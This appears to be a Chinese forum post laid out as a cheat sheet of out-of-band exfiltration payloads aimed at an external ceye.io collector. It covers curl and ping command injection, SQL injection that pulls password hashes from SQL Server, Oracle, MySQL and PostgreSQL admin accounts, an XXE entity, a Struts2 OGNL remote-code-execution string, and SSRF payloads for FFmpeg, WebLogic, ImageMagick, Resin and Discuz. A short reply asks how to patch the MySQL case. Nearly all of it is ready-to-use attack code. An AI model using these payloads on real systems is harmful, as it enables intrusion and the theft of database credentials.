远程服务器获取数据库回显数据

Jumbo

0x00 Command Executioni. *nix:

1. curl http://ip.port.b182oj.ceye.io/`whoami`

复制代码

ii. windows

1. ping %USERNAME%.b182oj.ceye.io
   

复制代码

0x01 sql Injection

From http://docs.hackinglab.cn/HawkEye-Log-Dns-Sqli.html.

i. SQL Server

1. DECLARE @host varchar(1024);
   
2. SELECT @host=(SELECT TOP 1
   
3. master.dbo.fn_varbintohexstr(password_hash)
   
4. FROM sys.sql_logins WHERE name='sa')
   
5. +'.ip.port.b182oj.ceye.io';
   
6. EXEC('master..xp_dirtree
   
7. "\\'+@host+'\foobar$"');

复制代码

ii. Oracle

1. SELECT UTL_INADDR.GET_HOST_ADDRESS('ip.port.b182oj.ceye.io');
   
2. SELECT UTL_HTTP.REQUEST('http://ip.port.b182oj.ceye.io/oracle') FROM DUAL;
   
3. SELECT HTTPURITYPE('http://ip.port.b182oj.ceye.io/oracle').GETCLOB() FROM DUAL;
   
4. SELECT DBMS_LDAP.INIT(('oracle.ip.port.b182oj.ceye.io',80) FROM DUAL;
   
5. SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.ip.port.b182oj.ceye.io',80) FROM DUAL;

复制代码

iii. MySQL

1. SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.port.b182oj.ceye.io\\abc'));

复制代码

iv. PostgreSQL

1. DROP TABLE IF EXISTS table_output;
   
2. CREATE TABLE table_output(content text);
   
3. CREATE OR REPLACE FUNCTION temp_function()
   
4. RETURNS VOID AS $
   
5. DECLARE exec_cmd TEXT;
   
6. DECLARE query_result TEXT;
   
7. BEGIN
   
8. SELECT INTO query_result (SELECT passwd
   
9. FROM pg_shadow WHERE usename='postgres');
   
10. exec_cmd := E'COPY table_output(content)
    
11. FROM E\'\\\\\\\\'||query_result||E'.psql.ip.port.b182oj.ceye.io\\\\foobar.txt\'';
    
12. EXECUTE exec_cmd;
    
13. END;
    
14. $ LANGUAGE plpgsql SECURITY DEFINER;
    
15. SELECT temp_function();

复制代码

0x02 XML Entity Injection

1. <?xml version="1.0" encoding="UTF-8"?>
   
2. <!DOCTYPE root [
   
3. <!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
   
4. %remote;]>
   
5. <root/>

复制代码

0x03 Othersi. Struts2

1. xx.action?redirect:http://ip.port.b182oj.ceye.io/%25{3*4}
   
2. 
   
3. xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://ip.port.b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}

复制代码

ii. FFMpeg

1. #EXTM3U
   
2. #EXT-X-MEDIA-SEQUENCE:0
   
3. #EXTINF:10.0,
   
4. concat:http://ip.port.b182oj.ceye.io
   
5. #EXT-X-ENDLIST

复制代码

iii. Weblogic

1. xxoo.com/uddiexplorer/SearchPublicRegistries.jsp?operator=http://ip.port.b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search

复制代码

iv. ImageMagick

1. push graphic-context
   
2. viewbox 0 0 640 480
   
3. fill 'url(http://ip.port.b182oj.ceye.io)'
   
4. pop graphic-context

复制代码

v. Resin

1. xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://ip.port.b182oj.ceye.io/ssrf
   

复制代码

vi. Discuz

1. http://xxx.xxxx.com/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://ip.port.b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo

复制代码

blackflame

好大上，例如mysql的该怎么补呢